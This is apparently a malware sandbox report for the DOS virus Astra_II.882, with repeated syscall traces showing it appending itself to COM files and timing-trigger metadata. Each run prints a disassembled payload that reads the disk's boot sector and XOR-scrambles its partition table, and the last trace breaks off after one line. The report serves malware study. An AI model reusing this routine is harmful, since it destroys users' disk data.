Sample viewer

vx.netlux.org/Virus.DOS.Astra_II.882


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:16:18.771648619Z 53 PC: 12ac3 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:16:18.773258342Z 2 PC: 12aec | Character output (Char = '00')
2018-12-17T22:16:18.77536445Z 37 PC: 12b20 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:16:18.776389078Z 48 PC: 12b24 | Get DOS version
2018-12-17T22:16:18.777462672Z 26 PC: 12ccc | Set disk transfer address
2018-12-17T22:16:18.778570368Z 78 PC: 12cd3 | Find first file
2018-12-17T22:16:18.782544396Z 61 PC: 12d12 | Open file (Filename = '')
2018-12-17T22:16:18.78656244Z 63 PC: 12d2d | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:16:18.790733235Z 66 PC: 12d51 | Move file pointer
2018-12-17T22:16:18.791929729Z 66 PC: 12d75 | Move file pointer
2018-12-17T22:16:18.792855125Z 64 PC: 12d87 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:16:18.794855684Z 66 PC: 12d96 | Move file pointer
2018-12-17T22:16:18.795944251Z 64 PC: 12da8 | Write file or device (Write 882 bytes on handle 5)
2018-12-17T22:16:18.807285675Z 62 PC: 12db5 | Close file
2018-12-17T22:16:18.814832554Z 79 PC: 12ce5 | Find next file
2018-12-17T22:16:18.816813443Z 61 PC: 12d12 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:16:18.820928951Z 63 PC: 12d2d | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:16:18.837290493Z 66 PC: 12d51 | Move file pointer
2018-12-17T22:16:18.839462305Z 66 PC: 12d75 | Move file pointer
2018-12-17T22:16:18.840857468Z 64 PC: 12d87 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:16:18.843593977Z 66 PC: 12d96 | Move file pointer
2018-12-17T22:16:18.845770062Z 64 PC: 12da8 | Write file or device (Write 882 bytes on handle 5)
2018-12-17T22:16:18.85425719Z 62 PC: 12db5 | Close file
2018-12-17T22:16:18.862016954Z 79 PC: 12ce5 | Find next file
2018-12-17T22:16:18.864991694Z 61 PC: 12d12 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:16:18.871682195Z 63 PC: 12d2d | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:16:18.877691726Z 66 PC: 12d51 | Move file pointer
2018-12-17T22:16:18.883662443Z 66 PC: 12d75 | Move file pointer
2018-12-17T22:16:18.88502043Z 64 PC: 12d87 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:16:18.887613016Z 66 PC: 12d96 | Move file pointer
2018-12-17T22:16:18.890206087Z 64 PC: 12da8 | Write file or device (Write 882 bytes on handle 5)
2018-12-17T22:16:18.898486236Z 62 PC: 12db5 | Close file
2018-12-17T22:16:18.906468556Z 79 PC: 12ce5 | Find next file
2018-12-17T22:16:18.9089755Z 61 PC: 12d12 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:16:18.915491784Z 63 PC: 12d2d | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:16:18.922025748Z 66 PC: 12d51 | Move file pointer
2018-12-17T22:16:18.923251039Z 66 PC: 12d75 | Move file pointer
2018-12-17T22:16:18.924911305Z 64 PC: 12d87 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:16:18.927354581Z 66 PC: 12d96 | Move file pointer
2018-12-17T22:16:18.928954895Z 64 PC: 12da8 | Write file or device (Write 882 bytes on handle 5)
2018-12-17T22:16:18.937448549Z 62 PC: 12db5 | Close file
2018-12-17T22:16:18.945200437Z 79 PC: 12ce5 | Find next file
2018-12-17T22:16:18.947590867Z 61 PC: 12d12 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:16:18.954185603Z 63 PC: 12d2d | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:16:18.960185301Z 66 PC: 12d51 | Move file pointer
2018-12-17T22:16:18.961401182Z 66 PC: 12d75 | Move file pointer
2018-12-17T22:16:18.963246629Z 64 PC: 12d87 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:16:18.966067153Z 66 PC: 12d96 | Move file pointer
2018-12-17T22:16:18.967737388Z 64 PC: 12da8 | Write file or device (Write 882 bytes on handle 5)
2018-12-17T22:16:18.976448601Z 62 PC: 12db5 | Close file
2018-12-17T22:16:18.98493443Z 79 PC: 12ce5 | Find next file
2018-12-17T22:16:18.987653065Z 61 PC: 12d12 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:16:18.995183769Z 63 PC: 12d2d | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:16:19.001504667Z 66 PC: 12d51 | Move file pointer
2018-12-17T22:16:19.003167519Z 66 PC: 12d75 | Move file pointer
2018-12-17T22:16:19.004760714Z 64 PC: 12d87 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:16:19.008824217Z 66 PC: 12d96 | Move file pointer
2018-12-17T22:16:19.010791833Z 64 PC: 12da8 | Write file or device (Write 882 bytes on handle 5)
2018-12-17T22:16:19.019862868Z 62 PC: 12db5 | Close file
2018-12-17T22:16:19.02713428Z 79 PC: 12ce5 | Find next file
2018-12-17T22:16:19.028836713Z 61 PC: 12d12 | Open file (Filename = 'PAH.COM')
2018-12-17T22:16:19.032818637Z 63 PC: 12d2d | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:16:19.037476797Z 66 PC: 12d51 | Move file pointer
2018-12-17T22:16:19.038425793Z 66 PC: 12d75 | Move file pointer
2018-12-17T22:16:19.039458573Z 64 PC: 12d87 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:16:19.041686596Z 66 PC: 12d96 | Move file pointer
2018-12-17T22:16:19.04280635Z 64 PC: 12da8 | Write file or device (Write 882 bytes on handle 5)
2018-12-17T22:16:19.048045737Z 62 PC: 12db5 | Close file
2018-12-17T22:16:19.053476598Z 79 PC: 12ce5 | Find next file
2018-12-17T22:16:19.055805528Z 61 PC: 12d12 | Open file (Filename = 'TEST.COM')
2018-12-17T22:16:19.062063405Z 63 PC: 12d2d | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:16:19.065122893Z 66 PC: 12d51 | Move file pointer
2018-12-17T22:16:19.066404174Z 62 PC: 12db5 | Close file
2018-12-17T22:16:19.067988998Z 79 PC: 12ce5 | Find next file
2018-12-17T22:16:19.070868932Z 26 PC: 12cf0 | Set disk transfer address
2018-12-17T22:16:19.072331483Z 26 PC: 12ccc | Set disk transfer address
2018-12-17T22:16:19.073314592Z 78 PC: 12cd3 | Find first file
2018-12-17T22:16:19.07809969Z 26 PC: 12cf0 | Set disk transfer address
2018-12-17T22:16:19.078976451Z 44 PC: 12b82 | Get time
0x12b82: cmp cl, 0x11
0x12b85: jne 0x12bc0
0x12b87: mov bx, bp
0x12b89: add bx, 0x3ad
0x12b8d: mov dx, 0x80
0x12b90: mov cx, 1
0x12b93: mov ax, 0x201
0x12b96: int 0x13
0x12b98: xor si, si
0x12b9a: xor byte ptr [bx + si + 0x1c2], 0x55
0x12b9f: add si, 0x10
0x12ba2: cmp si, 0x40
0x12ba5: jle 0x12b9a
0x12ba7: mov dx, 0x80
0x12baa: mov cx, 1
0x12bad: mov ax, 0x301
0x12bb0: int 0x13
0x12bb2: mov ax, 0x1102
0x12bb5: mov bl, al
0x12bb7: int 0x10
2018-12-17T22:16:19.080502481Z 9 PC: 12aa2 | Display string (String= 'ABCDE - This is a 100 byte COM test, 1994 ')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":2927,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:47:44.715998222Z 53 PC: 12ac3 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:47:44.717929181Z 2 PC: 12aec | Character output (Char = '00')
2018-12-25T11:47:44.720906084Z 37 PC: 12b20 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:47:44.722506889Z 48 PC: 12b24 | Get DOS version
2018-12-25T11:47:44.723931637Z 26 PC: 12ccc | Set disk transfer address
2018-12-25T11:47:44.729611073Z 78 PC: 12cd3 | Find first file
2018-12-25T11:47:44.735842714Z 61 PC: 12d12 | Open file (Filename = '')
2018-12-25T11:47:44.743137053Z 63 PC: 12d2d | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:47:44.749865941Z 66 PC: 12d51 | Move file pointer
2018-12-25T11:47:44.751873562Z 66 PC: 12d75 | Move file pointer
2018-12-25T11:47:44.753177328Z 64 PC: 12d87 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:47:44.756158521Z 66 PC: 12d96 | Move file pointer
2018-12-25T11:47:44.75775732Z 64 PC: 12da8 | Write file or device (Write 882 bytes on handle 5)
2018-12-25T11:47:44.771943262Z 62 PC: 12db5 | Close file
2018-12-25T11:47:44.798521052Z 79 PC: 12ce5 | Find next file
2018-12-25T11:47:44.800203786Z 61 PC: 12d12 | Open file (See above)
2018-12-25T11:47:44.807137852Z 63 PC: 12d2d | Read file or device (See above)
2018-12-25T11:47:44.814010924Z 66 PC: 12d51 | Move file pointer (See above)
2018-12-25T11:47:44.815369763Z 66 PC: 12d75 | Move file pointer (See above)
2018-12-25T11:47:44.816521345Z 64 PC: 12d87 | Write file or device (See above)
2018-12-25T11:47:44.820272562Z 66 PC: 12d96 | Move file pointer (See above)
2018-12-25T11:47:44.822047606Z 64 PC: 12da8 | Write file or device (See above)
2018-12-25T11:47:44.830377964Z 62 PC: 12db5 | Close file (See above)
2018-12-25T11:47:44.839072186Z 79 PC: 12ce5 | Find next file (See above)
2018-12-25T11:47:44.841966881Z 61 PC: 12d12 | Open file (See above)
2018-12-25T11:47:44.848428506Z 63 PC: 12d2d | Read file or device (See above)
2018-12-25T11:47:44.855026525Z 66 PC: 12d51 | Move file pointer (See above)
2018-12-25T11:47:44.856480551Z 66 PC: 12d75 | Move file pointer (See above)
2018-12-25T11:47:44.857838533Z 64 PC: 12d87 | Write file or device (See above)
2018-12-25T11:47:44.860838108Z 66 PC: 12d96 | Move file pointer (See above)
2018-12-25T11:47:44.862521454Z 64 PC: 12da8 | Write file or device (See above)
2018-12-25T11:47:44.87130149Z 62 PC: 12db5 | Close file (See above)
2018-12-25T11:47:44.880167076Z 79 PC: 12ce5 | Find next file (See above)
2018-12-25T11:47:44.89769744Z 61 PC: 12d12 | Open file (See above)
2018-12-25T11:47:44.904624021Z 63 PC: 12d2d | Read file or device (See above)
2018-12-25T11:47:44.911716444Z 66 PC: 12d51 | Move file pointer (See above)
2018-12-25T11:47:44.913300932Z 66 PC: 12d75 | Move file pointer (See above)
2018-12-25T11:47:44.915202816Z 64 PC: 12d87 | Write file or device (See above)
2018-12-25T11:47:44.917822775Z 66 PC: 12d96 | Move file pointer (See above)
2018-12-25T11:47:44.924878507Z 64 PC: 12da8 | Write file or device (See above)
2018-12-25T11:47:44.935286939Z 62 PC: 12db5 | Close file (See above)
2018-12-25T11:47:44.944003815Z 79 PC: 12ce5 | Find next file (See above)
2018-12-25T11:47:44.949234234Z 61 PC: 12d12 | Open file (See above)
2018-12-25T11:47:44.95708277Z 63 PC: 12d2d | Read file or device (See above)
2018-12-25T11:47:44.963451981Z 66 PC: 12d51 | Move file pointer (See above)
2018-12-25T11:47:44.96575073Z 66 PC: 12d75 | Move file pointer (See above)
2018-12-25T11:47:44.967078679Z 64 PC: 12d87 | Write file or device (See above)
2018-12-25T11:47:44.96963907Z 66 PC: 12d96 | Move file pointer (See above)
2018-12-25T11:47:44.972786184Z 64 PC: 12da8 | Write file or device (See above)
2018-12-25T11:47:44.98157991Z 62 PC: 12db5 | Close file (See above)
2018-12-25T11:47:44.990170303Z 79 PC: 12ce5 | Find next file (See above)
2018-12-25T11:47:44.993377175Z 61 PC: 12d12 | Open file (See above)
2018-12-25T11:47:45.00011352Z 63 PC: 12d2d | Read file or device (See above)
2018-12-25T11:47:45.006672906Z 66 PC: 12d51 | Move file pointer (See above)
2018-12-25T11:47:45.00909078Z 66 PC: 12d75 | Move file pointer (See above)
2018-12-25T11:47:45.010871591Z 64 PC: 12d87 | Write file or device (See above)
2018-12-25T11:47:45.013764952Z 66 PC: 12d96 | Move file pointer (See above)
2018-12-25T11:47:45.015931843Z 64 PC: 12da8 | Write file or device (See above)
2018-12-25T11:47:45.025719989Z 62 PC: 12db5 | Close file (See above)
2018-12-25T11:47:45.034028926Z 79 PC: 12ce5 | Find next file (See above)
2018-12-25T11:47:45.037228588Z 61 PC: 12d12 | Open file (See above)
2018-12-25T11:47:45.045029472Z 63 PC: 12d2d | Read file or device (See above)
2018-12-25T11:47:45.051594665Z 66 PC: 12d51 | Move file pointer (See above)
2018-12-25T11:47:45.053256124Z 66 PC: 12d75 | Move file pointer (See above)
2018-12-25T11:47:45.056016086Z 64 PC: 12d87 | Write file or device (See above)
2018-12-25T11:47:45.058922646Z 66 PC: 12d96 | Move file pointer (See above)
2018-12-25T11:47:45.060886317Z 64 PC: 12da8 | Write file or device (See above)
2018-12-25T11:47:45.070140827Z 62 PC: 12db5 | Close file (See above)
2018-12-25T11:47:45.078696241Z 79 PC: 12ce5 | Find next file (See above)
2018-12-25T11:47:45.081543073Z 61 PC: 12d12 | Open file (See above)
2018-12-25T11:47:45.089687046Z 63 PC: 12d2d | Read file or device (See above)
2018-12-25T11:47:45.092829224Z 66 PC: 12d51 | Move file pointer (See above)
2018-12-25T11:47:45.094226373Z 62 PC: 12db5 | Close file (See above)
2018-12-25T11:47:45.096640522Z 79 PC: 12ce5 | Find next file (See above)
2018-12-25T11:47:45.099107052Z 26 PC: 12cf0 | Set disk transfer address
2018-12-25T11:47:45.100482429Z 26 PC: 12ccc | Set disk transfer address (See above)
2018-12-25T11:47:45.104032447Z 78 PC: 12cd3 | Find first file (See above)
2018-12-25T11:47:45.109966308Z 26 PC: 12cf0 | Set disk transfer address (See above)
2018-12-25T11:47:45.111217262Z 44 PC: 12b82 | Get time
0x12b82: cmp cl, 0x11
0x12b85: jne 0x12bc0
0x12b87: mov bx, bp
0x12b89: add bx, 0x3ad
0x12b8d: mov dx, 0x80
0x12b90: mov cx, 1
0x12b93: mov ax, 0x201
0x12b96: int 0x13
0x12b98: xor si, si
0x12b9a: xor byte ptr [bx + si + 0x1c2], 0x55
0x12b9f: add si, 0x10
0x12ba2: cmp si, 0x40
0x12ba5: jle 0x12b9a
0x12ba7: mov dx, 0x80
0x12baa: mov cx, 1
0x12bad: mov ax, 0x301
0x12bb0: int 0x13
0x12bb2: mov ax, 0x1102
0x12bb5: mov bl, al
0x12bb7: int 0x10
2018-12-25T11:47:45.11436267Z 9 PC: 12aa2 | Display string (String= 'ABCDE - This is a 100 byte COM test, 1994 ')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":17,"Second":0,"TimeBased":true,"OriginalID":2927,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:47:46.335557793Z 53 PC: 12ac3 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:47:46.33769764Z 2 PC: 12aec | Character output (Char = '00')
2018-12-25T11:47:46.339982079Z 37 PC: 12b20 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:47:46.341214807Z 48 PC: 12b24 | Get DOS version
2018-12-25T11:47:46.342969023Z 26 PC: 12ccc | Set disk transfer address
2018-12-25T11:47:46.344113171Z 78 PC: 12cd3 | Find first file
2018-12-25T11:47:46.350321541Z 61 PC: 12d12 | Open file (Filename = '')
2018-12-25T11:47:46.357824601Z 63 PC: 12d2d | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:47:46.367143104Z 66 PC: 12d51 | Move file pointer
2018-12-25T11:47:46.369052768Z 66 PC: 12d75 | Move file pointer
2018-12-25T11:47:46.375646091Z 64 PC: 12d87 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:47:46.378688552Z 66 PC: 12d96 | Move file pointer
2018-12-25T11:47:46.38165289Z 64 PC: 12da8 | Write file or device (Write 882 bytes on handle 5)
2018-12-25T11:47:46.397867898Z 62 PC: 12db5 | Close file
2018-12-25T11:47:46.405829321Z 79 PC: 12ce5 | Find next file
2018-12-25T11:47:46.408697733Z 61 PC: 12d12 | Open file (See above)
2018-12-25T11:47:46.416349082Z 63 PC: 12d2d | Read file or device (See above)
2018-12-25T11:47:46.422826394Z 66 PC: 12d51 | Move file pointer (See above)
2018-12-25T11:47:46.424511544Z 66 PC: 12d75 | Move file pointer (See above)
2018-12-25T11:47:46.426865676Z 64 PC: 12d87 | Write file or device (See above)
2018-12-25T11:47:46.429778405Z 66 PC: 12d96 | Move file pointer (See above)
2018-12-25T11:47:46.431796463Z 64 PC: 12da8 | Write file or device (See above)
2018-12-25T11:47:46.440519063Z 62 PC: 12db5 | Close file (See above)
2018-12-25T11:47:46.449776344Z 79 PC: 12ce5 | Find next file (See above)
2018-12-25T11:47:46.452749079Z 61 PC: 12d12 | Open file (See above)
2018-12-25T11:47:46.460434243Z 63 PC: 12d2d | Read file or device (See above)
2018-12-25T11:47:46.468245767Z 66 PC: 12d51 | Move file pointer (See above)
2018-12-25T11:47:46.469688614Z 66 PC: 12d75 | Move file pointer (See above)
2018-12-25T11:47:46.471101945Z 64 PC: 12d87 | Write file or device (See above)
2018-12-25T11:47:46.474520232Z 66 PC: 12d96 | Move file pointer (See above)
2018-12-25T11:47:46.476272822Z 64 PC: 12da8 | Write file or device (See above)
2018-12-25T11:47:46.484422079Z 62 PC: 12db5 | Close file (See above)
2018-12-25T11:47:46.492744605Z 79 PC: 12ce5 | Find next file (See above)
2018-12-25T11:47:46.495463959Z 61 PC: 12d12 | Open file (See above)
2018-12-25T11:47:46.501932581Z 63 PC: 12d2d | Read file or device (See above)
2018-12-25T11:47:46.508995786Z 66 PC: 12d51 | Move file pointer (See above)
2018-12-25T11:47:46.510428315Z 66 PC: 12d75 | Move file pointer (See above)
2018-12-25T11:47:46.511747119Z 64 PC: 12d87 | Write file or device (See above)
2018-12-25T11:47:46.515225156Z 66 PC: 12d96 | Move file pointer (See above)
2018-12-25T11:47:46.516928363Z 64 PC: 12da8 | Write file or device (See above)
2018-12-25T11:47:46.525588168Z 62 PC: 12db5 | Close file (See above)
2018-12-25T11:47:46.534980458Z 79 PC: 12ce5 | Find next file (See above)
2018-12-25T11:47:46.537653301Z 61 PC: 12d12 | Open file (See above)
2018-12-25T11:47:46.544481894Z 63 PC: 12d2d | Read file or device (See above)
2018-12-25T11:47:46.55160733Z 66 PC: 12d51 | Move file pointer (See above)
2018-12-25T11:47:46.553101902Z 66 PC: 12d75 | Move file pointer (See above)
2018-12-25T11:47:46.55453198Z 64 PC: 12d87 | Write file or device (See above)
2018-12-25T11:47:46.557708283Z 66 PC: 12d96 | Move file pointer (See above)
2018-12-25T11:47:46.559392441Z 64 PC: 12da8 | Write file or device (See above)
2018-12-25T11:47:46.568317612Z 62 PC: 12db5 | Close file (See above)
2018-12-25T11:47:46.577331657Z 79 PC: 12ce5 | Find next file (See above)
2018-12-25T11:47:46.579895697Z 61 PC: 12d12 | Open file (See above)
2018-12-25T11:47:46.586275936Z 63 PC: 12d2d | Read file or device (See above)
2018-12-25T11:47:46.594137233Z 66 PC: 12d51 | Move file pointer (See above)
2018-12-25T11:47:46.595574591Z 66 PC: 12d75 | Move file pointer (See above)
2018-12-25T11:47:46.596943822Z 64 PC: 12d87 | Write file or device (See above)
2018-12-25T11:47:46.599537234Z 66 PC: 12d96 | Move file pointer (See above)
2018-12-25T11:47:46.602098131Z 64 PC: 12da8 | Write file or device (See above)
2018-12-25T11:47:46.610972226Z 62 PC: 12db5 | Close file (See above)
2018-12-25T11:47:46.619061695Z 79 PC: 12ce5 | Find next file (See above)
2018-12-25T11:47:46.623276264Z 61 PC: 12d12 | Open file (See above)
2018-12-25T11:47:46.630001005Z 63 PC: 12d2d | Read file or device (See above)
2018-12-25T11:47:46.636581066Z 66 PC: 12d51 | Move file pointer (See above)
2018-12-25T11:47:46.639001022Z 66 PC: 12d75 | Move file pointer (See above)
2018-12-25T11:47:46.64064242Z 64 PC: 12d87 | Write file or device (See above)
2018-12-25T11:47:46.643496197Z 66 PC: 12d96 | Move file pointer (See above)
2018-12-25T11:47:46.646457537Z 64 PC: 12da8 | Write file or device (See above)
2018-12-25T11:47:46.654784635Z 62 PC: 12db5 | Close file (See above)
2018-12-25T11:47:46.663152028Z 79 PC: 12ce5 | Find next file (See above)
2018-12-25T11:47:46.6668244Z 61 PC: 12d12 | Open file (See above)
2018-12-25T11:47:46.673599115Z 63 PC: 12d2d | Read file or device (See above)
2018-12-25T11:47:46.67639803Z 66 PC: 12d51 | Move file pointer (See above)
2018-12-25T11:47:46.6787491Z 62 PC: 12db5 | Close file (See above)
2018-12-25T11:47:46.680869489Z 79 PC: 12ce5 | Find next file (See above)
2018-12-25T11:47:46.683541432Z 26 PC: 12cf0 | Set disk transfer address
2018-12-25T11:47:46.685907441Z 26 PC: 12ccc | Set disk transfer address (See above)
2018-12-25T11:47:46.687334724Z 78 PC: 12cd3 | Find first file (See above)
2018-12-25T11:47:46.693229812Z 26 PC: 12cf0 | Set disk transfer address (See above)
2018-12-25T11:47:46.695368247Z 44 PC: 12b82 | Get time
0x12b82: cmp cl, 0x11
0x12b85: jne 0x12bc0
0x12b87: mov bx, bp
0x12b89: add bx, 0x3ad
0x12b8d: mov dx, 0x80
0x12b90: mov cx, 1
0x12b93: mov ax, 0x201
0x12b96: int 0x13
0x12b98: xor si, si
0x12b9a: xor byte ptr [bx + si + 0x1c2], 0x55
0x12b9f: add si, 0x10
0x12ba2: cmp si, 0x40
0x12ba5: jle 0x12b9a
0x12ba7: mov dx, 0x80
0x12baa: mov cx, 1
0x12bad: mov ax, 0x301
0x12bb0: int 0x13
0x12bb2: mov ax, 0x1102
0x12bb5: mov bl, al
0x12bb7: int 0x10
2018-12-25T11:47:47.020721112Z 9 PC: 12aa2 | Display string (String= 'ABCDE - This is a 100 byte COM test, 1994 ')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":2927,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:47:47.384966151Z 53 PC: 12ac3 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:47:47.387013126Z 2 PC: 12aec | Character output (Char = '00')
2018-12-25T11:47:47.389730549Z 37 PC: 12b20 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:47:47.391567027Z 48 PC: 12b24 | Get DOS version
2018-12-25T11:47:47.393557821Z 26 PC: 12ccc | Set disk transfer address
2018-12-25T11:47:47.395089747Z 78 PC: 12cd3 | Find first file
2018-12-25T11:47:47.402603109Z 61 PC: 12d12 | Open file (Filename = '')
2018-12-25T11:47:47.410261497Z 63 PC: 12d2d | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:47:47.417791633Z 66 PC: 12d51 | Move file pointer
2018-12-25T11:47:47.41944765Z 66 PC: 12d75 | Move file pointer
2018-12-25T11:47:47.421145091Z 64 PC: 12d87 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:47:47.424634785Z 66 PC: 12d96 | Move file pointer
2018-12-25T11:47:47.426530185Z 64 PC: 12da8 | Write file or device (Write 882 bytes on handle 5)
2018-12-25T11:47:47.443882969Z 62 PC: 12db5 | Close file
2018-12-25T11:47:47.453612647Z 79 PC: 12ce5 | Find next file
2018-12-25T11:47:47.455704207Z 61 PC: 12d12 | Open file (See above)
2018-12-25T11:47:47.460076086Z 63 PC: 12d2d | Read file or device (See above)
2018-12-25T11:47:47.466223479Z 66 PC: 12d51 | Move file pointer (See above)
2018-12-25T11:47:47.467837977Z 66 PC: 12d75 | Move file pointer (See above)
2018-12-25T11:47:47.469308307Z 64 PC: 12d87 | Write file or device (See above)
2018-12-25T11:47:47.471866138Z 66 PC: 12d96 | Move file pointer (See above)
2018-12-25T11:47:47.473572938Z 64 PC: 12da8 | Write file or device (See above)
2018-12-25T11:47:47.479060738Z 62 PC: 12db5 | Close file (See above)
2018-12-25T11:47:47.485624044Z 79 PC: 12ce5 | Find next file (See above)
2018-12-25T11:47:47.488712792Z 61 PC: 12d12 | Open file (See above)
2018-12-25T11:47:47.496023535Z 63 PC: 12d2d | Read file or device (See above)
2018-12-25T11:47:47.503229677Z 66 PC: 12d51 | Move file pointer (See above)
2018-12-25T11:47:47.505541613Z 66 PC: 12d75 | Move file pointer (See above)
2018-12-25T11:47:47.507237694Z 64 PC: 12d87 | Write file or device (See above)
2018-12-25T11:47:47.510234003Z 66 PC: 12d96 | Move file pointer (See above)
2018-12-25T11:47:47.513348397Z 64 PC: 12da8 | Write file or device (See above)
2018-12-25T11:47:47.522885893Z 62 PC: 12db5 | Close file (See above)
2018-12-25T11:47:47.531760563Z 79 PC: 12ce5 | Find next file (See above)
2018-12-25T11:47:47.535276511Z 61 PC: 12d12 | Open file (See above)
2018-12-25T11:47:47.543360268Z 63 PC: 12d2d | Read file or device (See above)
2018-12-25T11:47:47.550599447Z 66 PC: 12d51 | Move file pointer (See above)
2018-12-25T11:47:47.553238181Z 66 PC: 12d75 | Move file pointer (See above)
2018-12-25T11:47:47.55495821Z 64 PC: 12d87 | Write file or device (See above)
2018-12-25T11:47:47.558288206Z 66 PC: 12d96 | Move file pointer (See above)
2018-12-25T11:47:47.561099387Z 64 PC: 12da8 | Write file or device (See above)
2018-12-25T11:47:47.570437848Z 62 PC: 12db5 | Close file (See above)
2018-12-25T11:47:47.581188174Z 79 PC: 12ce5 | Find next file (See above)
2018-12-25T11:47:47.585251531Z 61 PC: 12d12 | Open file (See above)
2018-12-25T11:47:47.593112471Z 63 PC: 12d2d | Read file or device (See above)
2018-12-25T11:47:47.600207739Z 66 PC: 12d51 | Move file pointer (See above)
2018-12-25T11:47:47.60190783Z 66 PC: 12d75 | Move file pointer (See above)
2018-12-25T11:47:47.604381632Z 64 PC: 12d87 | Write file or device (See above)
2018-12-25T11:47:47.607705127Z 66 PC: 12d96 | Move file pointer (See above)
2018-12-25T11:47:47.609998779Z 64 PC: 12da8 | Write file or device (See above)
2018-12-25T11:47:47.620925911Z 62 PC: 12db5 | Close file (See above)
2018-12-25T11:47:47.630278054Z 79 PC: 12ce5 | Find next file (See above)
2018-12-25T11:47:47.633198822Z 61 PC: 12d12 | Open file (See above)
2018-12-25T11:47:47.640926904Z 63 PC: 12d2d | Read file or device (See above)
2018-12-25T11:47:47.647956751Z 66 PC: 12d51 | Move file pointer (See above)
2018-12-25T11:47:47.650271198Z 66 PC: 12d75 | Move file pointer (See above)
2018-12-25T11:47:47.652407393Z 64 PC: 12d87 | Write file or device (See above)
2018-12-25T11:47:47.655745745Z 66 PC: 12d96 | Move file pointer (See above)
2018-12-25T11:47:47.658003618Z 64 PC: 12da8 | Write file or device (See above)
2018-12-25T11:47:47.668862369Z 62 PC: 12db5 | Close file (See above)
2018-12-25T11:47:47.678225838Z 79 PC: 12ce5 | Find next file (See above)
2018-12-25T11:47:47.681548345Z 61 PC: 12d12 | Open file (See above)
2018-12-25T11:47:47.689221925Z 63 PC: 12d2d | Read file or device (See above)
2018-12-25T11:47:47.697452796Z 66 PC: 12d51 | Move file pointer (See above)
2018-12-25T11:47:47.69905373Z 66 PC: 12d75 | Move file pointer (See above)
2018-12-25T11:47:47.700667254Z 64 PC: 12d87 | Write file or device (See above)
2018-12-25T11:47:47.705234551Z 66 PC: 12d96 | Move file pointer (See above)
2018-12-25T11:47:47.707312511Z 64 PC: 12da8 | Write file or device (See above)
2018-12-25T11:47:47.717852843Z 62 PC: 12db5 | Close file (See above)
2018-12-25T11:47:47.728068913Z 79 PC: 12ce5 | Find next file (See above)
2018-12-25T11:47:47.731378571Z 61 PC: 12d12 | Open file (See above)
2018-12-25T11:47:47.73801057Z 63 PC: 12d2d | Read file or device (See above)
2018-12-25T11:47:47.74030244Z 66 PC: 12d51 | Move file pointer (See above)
2018-12-25T11:47:47.741705512Z 62 PC: 12db5 | Close file (See above)
2018-12-25T11:47:47.743708108Z 79 PC: 12ce5 | Find next file (See above)
2018-12-25T11:47:47.746881043Z 26 PC: 12cf0 | Set disk transfer address
2018-12-25T11:47:47.749325136Z 26 PC: 12ccc | Set disk transfer address (See above)
2018-12-25T11:47:47.750727241Z 78 PC: 12cd3 | Find first file (See above)
2018-12-25T11:47:47.757379469Z 26 PC: 12cf0 | Set disk transfer address (See above)
2018-12-25T11:47:47.758741061Z 44 PC: 12b82 | Get time
0x12b82: cmp cl, 0x11
0x12b85: jne 0x12bc0
0x12b87: mov bx, bp
0x12b89: add bx, 0x3ad
0x12b8d: mov dx, 0x80
0x12b90: mov cx, 1
0x12b93: mov ax, 0x201
0x12b96: int 0x13
0x12b98: xor si, si
0x12b9a: xor byte ptr [bx + si + 0x1c2], 0x55
0x12b9f: add si, 0x10
0x12ba2: cmp si, 0x40
0x12ba5: jle 0x12b9a
0x12ba7: mov dx, 0x80
0x12baa: mov cx, 1
0x12bad: mov ax, 0x301
0x12bb0: int 0x13
0x12bb2: mov ax, 0x1102
0x12bb5: mov bl, al
0x12bb7: int 0x10
2018-12-25T11:47:47.76123902Z 9 PC: 12aa2 | Display string (String= 'ABCDE - This is a 100 byte COM test, 1994 ')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":17,"Second":0,"TimeBased":true,"OriginalID":2927,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:47:47.87435579Z 53 PC: 12ac3 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
